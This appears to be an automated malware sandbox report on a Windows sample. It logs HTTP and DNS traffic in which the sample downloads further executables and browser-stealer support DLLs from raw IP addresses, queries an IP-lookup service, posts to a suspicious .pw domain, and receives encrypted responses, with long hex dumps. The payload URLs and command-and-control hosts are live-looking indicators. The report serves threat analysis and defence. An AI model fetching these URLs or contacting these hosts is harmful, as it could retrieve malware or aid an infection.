Source: global traffic	HTTP traffic detected: GET /1bee3bfb-d231-4c42-80c1-836b79e3e5b0/downloads/b6496915-3881-4826-90f1-0b8d8e139169/M5traider.exe?response-content-disposition=attachment%3B%20filename%3D%22M5traider.exe%22&AWSAccessKeyId=ASIA6KOSE3BNPACMPVWP&Signature=VykWqZsmiqhA27rtu14Ozvrz3gU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECEaCXVzLWVhc3QtMSJHMEUCIC9ZJg5LyShpGCfgK9xBd%2BNfXFo5Jl1BokDusFXKUzl1AiEA7f8F1VXwUrCxToTOc9Slu8foenPFBkDfJnlad1jjyqQqsAIIqv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDMt7cSR0FVvzrB4MKCqEAs00XLyqwgYvgllfcxxML0V7rNRQULIYUBLpqfwSi9NIlid8dZk0%2BkGa6LzBU0w6EZSdIbxY8T0HGRIy4ZsgthFREXzWAJvv1bbeEJRcDnTvAVTJxKFeB%2FJ8djugQ%2BBJpgk6n%2BRuptcwKHcsxg4%2F19qZXXKG%2FS8DS0INAd%2FZYDox5Xtff6S7qGXsd%2FGip83XMBWLlHwlAHQmWYi25uFpdF02FjEwFpDk3lqQIQ0C0IhUEKiMterg%2BQ2T4z43peg4F1tv%2B2%2Fh3DEVPw5PGYAhfZJqBM2ejvqzpeKHz9BnVWHPxh1jEKjbfGI1A1QDq%2FOUZasoV7JfQ1aluRvMaNJTn4QEcM88MIOpsawGOp0B6A%2BOtuswH3ZDYA1WLInRm1gRHfBtEnqS%2BFl62PAReCq9Ma%2Fr0ln5Qz3Kj%2Bn51V6V6693cTWiS1oTuWfeFfQKHnaD0HR7grGubgANmsvIN%2FpCehFQUeWye4C2Fch1mk9u9QQNz%2BcCQ%2BEQzhLnnYUcZ6txuTVH29pM9tUcxooY9Nfr2MEEK9zd%2BfdQJsuyu7UM68N4AaSa6d75Keav8g%3D%3D&Expires=1703697292 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bbuseruploads.s3.amazonaws.com
Source: global traffic	HTTP traffic detected: GET /TukN/PL1226two.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /forrock.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 5.42.65.125
Source: global traffic	HTTP traffic detected: GET /?format=dfg HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: api.ipify.orgConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /scripts/plus.php?ip=212.102.41.2&substr=eight&s=ab HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 91.92.254.7Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /syncUpd.exe HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 5.42.64.35Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/sqlite3.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/freebl3.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/mozglue.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/msvcp140.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/nss3.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/softokn3.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/vcruntime140.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache

Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: OS X; U; en) Presto/2.6.30 Version/10.61facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)tls: internal error: handshake returned an error but is marked successfultls: received unexpected handshake message of type %T when waiting for %T equals www.facebook.com (Facebook)
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: o Debian/1.6-7Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)2695994666715063979466701508701962594045780771442439172168272236806126959946667150639794667015087019630673557916 equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: bitbucket.org

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: chincenterblandwka.pw

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Dec 2023 16:58:46 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 38 0d 0a 04 00 00 00 2d 20 5c 6c 0d 0a 30 0d 0a 0d 0a Data Ascii: 8- \l0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 35 63 0d 0a 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 10 d8 fb df 5e bc 1a e5 bb 26 38 d3 93 5f fe d0 3a d7 a3 3b 4b eb 12 ad 01 7f 9a 0e d5 ba 37 b5 fe f5 6b bb 81 36 99 91 32 fd 7d e0 79 b2 04 06 98 2e c4 b2 9d 5b db 68 8f 6e 9d cf 80 f7 8e d0 77 81 b5 90 9e 2f 80 c9 73 0d a8 ea 0d 0a 30 0d 0a 0d 0a Data Ascii: 5cH>99$J^&8_:;K7k62}y.[hnw/s0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 61 0d 0a 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c5 12 e1 5c a9 f8 70 7d 87 d5 44 be c4 32 8a a5 31 5b f4 55 a6 1e 2d 0d 0a 30 0d 0a 0d 0a Data Ascii: 2aH>99$JY\p}D21[U-0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0a e1 9e cd ad 49 b1 fb 9e 1a 14 f1 c9 e9 21 0c ff 1a a3 04 28 3c ff 91 dd e4 d3 c2 7a 4d 8a a4 75 b4 f3 cf 5f 21 6f 40 51 f8 43 ab 4c cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 11 54 09 11 89 d2 af 2b e4 02 3d 97 24 41 7f fe a1 99 26 7d c6 74 f7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 4f 55 af ca 71 83 e8 b9 5f 45 28 18 ad 48 94 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff ff 78 97 af a6 7b b2 4d 82 fd 92 2b cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 b0 90 c0 e8 b1 55 84 3a a6 8d 43 89 4f 21 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ad 1b bf 78 51 79 fe 8c 70 e1 47 e4 fc 03 53 e2 37 df 87 b4 71 dc 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c f9 d3 19 1f 1a 0b 46 fd 99 74 70 3e 94 63 41 63 c2 75 6e fd 29 2a e7 d0 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 59 ac 44 36 09 bc dc 08 48 f8 cc 76 de 0c 91 7d 02 68 ad 60 3b 0e 84 03 b9 02 5d 17 74 fb ce 9b d2 96 0f 2d 6e 04 93 02 8d e4 24 bf 70 7e 3e 3f 43 1e 99 cb cc 9a f1 a1 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 1a 1b 70 30 3f d6 6a 72 f3 79 9b 1d 50 40 0e 20 2c 36 fc 7a 5c 0a 74 df 70 af 6d 2d c6 e3 51 d2 cd b3 5f 2f 87 ee b7 0f 9a 2e 51 79 60 9d ba 11 05 cc 5a d8 2c bd 4d 6d 2d 39 71 a6 78 48 e6 e6 35 05 63 f0 9f 3f 01 47 46 dd 52 47 a1 ca fa 41 f8 bc 46 27 d5 f4 df 70 1a 7d 06 e5 44 5f 14 f2 2d 7b 5e 08 0b dd 07 f9 09 d9 37 36 2b c4 c2 3c 51 1d e5 91 2b bc b6 9d 62 3e aa a7 79 3d 46 dc e9 c8 40 22 cf 5d f3 72 92 a6 91 a4 8f 42 ac 74 27 2c ee 50 f6 af a7 68 08 43 0d f9 be 2c ce c2 6c 6a 69 75 4d d7 03 e2 79 cb 43 b1 fc 11 17 68 35 d2 2d 0f f1 95 ba 94 14 ad 6e c1 bc cd 7c 79 6a da 0d 54 ff e7 dc 49 8c ff 3e cf 06 ec 23 cc f8 bf 40 bb 39 fe e2 ef a6 64 76 a1 2a 63 fa 2d 55 76 e9 b5 c5 55 ab 32 f8 24 34 a1 eb b5 e0 f7 a1 b9 c2 76 73 1e 40 28 2b aa 0a ee b9 30 21 bb 67 14 7b 5c 1e ed 69 db 63 02 21 5b d6 2f 9a f8 b9 77 6c 69 66 4b 83 2b ea e1 46 a8 5a 12 23 13 34 db 94 c8 4a 0c 4b e6 21 e2 22 f9 f0 16 ee 27 62 e8 a6 da 91 03 e9 a2 a3 a4 6a ba 49 62 3f b1 b1 96 fa d5 5d 18 67 0d b7 ee 7c f6 aa e7 28 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 62 37 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0d e1 6b 24 20 85 b1 fb 9e 1a 14 f1 c9 e9 21 0c ff 1a a3 04 25 3c ff e5 84 e4 d3 18 7b 4d 8a a4 75 b4 a3 83 06 21 6f 40 51 f8 43 6b 14 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 a2 67 97 24 47 7f fe b3 ae 2f 7d c7 74 d7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f cb d0 63 1a f8 bc 40 de dc fb 5d 56 9f 19 f6 ca 71 83 e8 b9 5f a5 70 18 93 83 95 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff 1f 22 97 af a6 7b b2 16 ce a4 92 2b cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 80 dc 99 e8 b1 55 84 3a a6 f9 1a 89 4f 27 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ac 0c ac 6f 30 79 fe 76 7d e1 47 e4 3c 5b 53 e2 23 df 87 b4 03 85 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c 79 d3 19 09 04 07 25 fd 99 04 b9 3f 94 63 81 3b c2 75 a6 fc 29 2a 89 89 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 5b 82 36 53 65 d3 bf 08 48 f4 cc 76 de 0c 51 2e 02 b8 5d 68 3b 0e fa 50 b9 4a 5d 17 74 f9 ce 9e d2 be be 2c 6e 20 43 02 cf e7 24 bd 70 73 3e 3f 45 92 18 c9 cc bb dd a1 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 09 2b 75 30 50 d6 6a 72 f2 79 9b 0c 68 1b 0e 20 2c 44 fd 7a 5c 7a 07 d0 70 af 67 57 ec f4 d1 d3 cd b3 5b 17 9a ee b7 0f 64 23 51 79 48 8d ba 11 0f e4 4b d8 2c b7 6d 63 2d 39 71 99 a4 b7 19 19 0d c9 9c 0f 60 17 13 47 46 d7 72 a0 a6 ca fa 61 f4 bc 46 27 f5 ee df 70 1a 0e 15 e5 44 55 3c e6 2d 7b 54 f6 05 dd 07 c1 b5 26 c8 c9 55 c5 c2 3c 55 27 43 6e d4 43 8e 3f 9d c1 55 a7 63 15 47 dc e9 ce 6a 22 e9 23 f1 72 92 a2 85 5a 8e 68 ac 74 3d 52 ec 50 f6 ab 8d 68 1b 73 0b f9 ef 2e ce c2 6e 6a 69 64 75 66 03 e2 79 35 4f b0 fc 54 10 68 35 d2 94 0e f1 95 fb 95 14 ad 81 c0 bc cd 2e 78 6a da 4e 54 ff e7 0c 48 8c ff 17 cf 06 ec 1b 78 f9 bf 40 83 0e ff e2 ef 86 60 76 a1 2a 1d c1 2c 55 72 92 92 c4 55 af 0b 39 db cb 5e cd 95 e4 f7 a1 b9 fa c0 8c e1 bf 3e 38 a8 32 47 b8 30 21 aa 6f 05 79 5f 0f ef 6a 55 0a 5f b0 c7 ee 75 9a f8 b9 5d 7d 6b 46 4b 82 2b ea dd 61 a8 5a 12 03 10 34 db 94 f0 cf f3 b4 19 30 e2 33 fb 61 05 e8 1f 31 e8 a6 da b1 03 e8 a2 a3 29 75 ba 49 63 2c b9 89 fd fb d5 5d 0e 74 0f 8f ee 7c f6 aa f1 3b 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 c1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 ab 83 b0 ff 2a b3 09 e1 5f 13 27 2c b1 fb 9e 1a 14 f1 c9 e9 c1 0c f1 1b a8 05 23 3c ff 45 d5 e4 d3 c4 7a 4d 8a a4 75 b4 1d 3d 57 21 6f 60 51 f8 43 ab 45 cb 12 84 4f da 06 d9 b5 40 33 1c 73 50 71 9d 0d 97 2d a0 f8 5c 17 54 09 11 89 d2 af 2b e4 42 34 97 24 43 7f fe b3 ae 2f 7d c5 74 97 19 3c 4b c5 4c 11 86 84 3c 18 51 62 0c 6b 86 35 f0 b8 5e 7f 1f 88 d1 67 1a 47 ba ad bd dc fb 5d 56 ef a7 a7 ca da 83 eb b8 54 44 28 18 ef f2 90 8d 8b 03 de cc 76 61 e6 96 ce e0 61 ed 41 d3 4a 2c ff 0f 75 97 a3 a6 3b b2 1c 60 f5 92 37 cd ad 86 7d 68 90 77 1f b9 2d 53 6c c2 52 67 3a 85 75 20 6a d8 05 46 f2 fc 3e 7e 88 02 f4 b6 7e 90 41 40 c6 74 50 e5 bf ff 87 b0 6d 45 94 46 2b b2 59 3e 35 26 1f 18 d2 2b fd 11 df 00 0b bd 33 f6 3e 06 ef 9b f2 1d 66 7c 1b 4c 9b 93 8c e9 71 6c d3 08 44 42 c8 e8 b1 75 84 3a a6 59 4b 89 4f 23 25 db db 1c 4c 13 b7 f6 51 cc cb e3 f4 75 bd 93 f1 ba 18 df 68 cd 1b 51 79 fe ce 72 e1 47 e4 fc 0a 53 e2 33 df 87 b4 a7 d4 86 c2 26 44 c7 77 18 24 6c 52 c2 4e 14 c6 39 4c b9 fd bb 7e 76 fc 24 fd 99 78 70 3e 94 63 61 6a c2 75 6c fd 29 2a 3d d8 10 64 b9 90 fc d7 21 ce fd d6 16 1b 50 7b fa ad 1b ac f3 32 09 bc cc 08 48 f8 74 72 de 0c 95 7d 02 b8 5f 68 3b 0e 84 03 b9 4a 5d 17 74 d9 ce 9e b2 90 cc 48 0f 14 22 02 8d d9 07 bd 70 73 ee 3b 45 92 3c c9 cc bb 61 a5 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 bf 82 20 c6 84 b6 a6 f2 84 9c 77 30 56 2a e1 d7 e3 0b 2b d2 e4 26 1a 0c a4 69 88 89 09 2b 75 30 50 d6 6a 72 f2 79 9b 0c 28 1b 0e e0 02 36 8e 08 3f 7a 07 d0 e8 a3 65 57 ec e4 96 d3 cd bd 59 17 9a 1a b3 0f 64 23 51 79 48 8d ba 11 0f e4 4b d8 6c b7 6d 23 2d 39 71 99 a4 b7 19 19 0d c9 9c 0f 60 17 13 47 46 d7 72 a0 a6 ca fa 61 f4 bc 46 27 f5 ee df 70 1a 0e 15 e5 44 55 3c e6 2d 7b 54 f6 05 dd 07 c1 b5 26 c8 c9 55 c5 c2 3c 55 27 43 6e d4 43 8e 3f 9d c1 55 a7 63 15 47 dc e9 ce 6a 22 e9 23 f1 72 92 a2 85 5a 8e 68 ac 74 3d 52 ec 50 f6 ab 8d 68 1b 73 0b f9 ef 2e ce c2 6e 6a 69 64 75 66 03 e2 79 35 4f b0 fc 54 10 68 35 d2 94 0e f1 95 fb 95 14 ad 81 c0 bc cd 2e 78 6a da 4e 54 ff e7 0c 48 8c ff 17 cf 06 ec 1b 78 f9 bf 40 83 0e 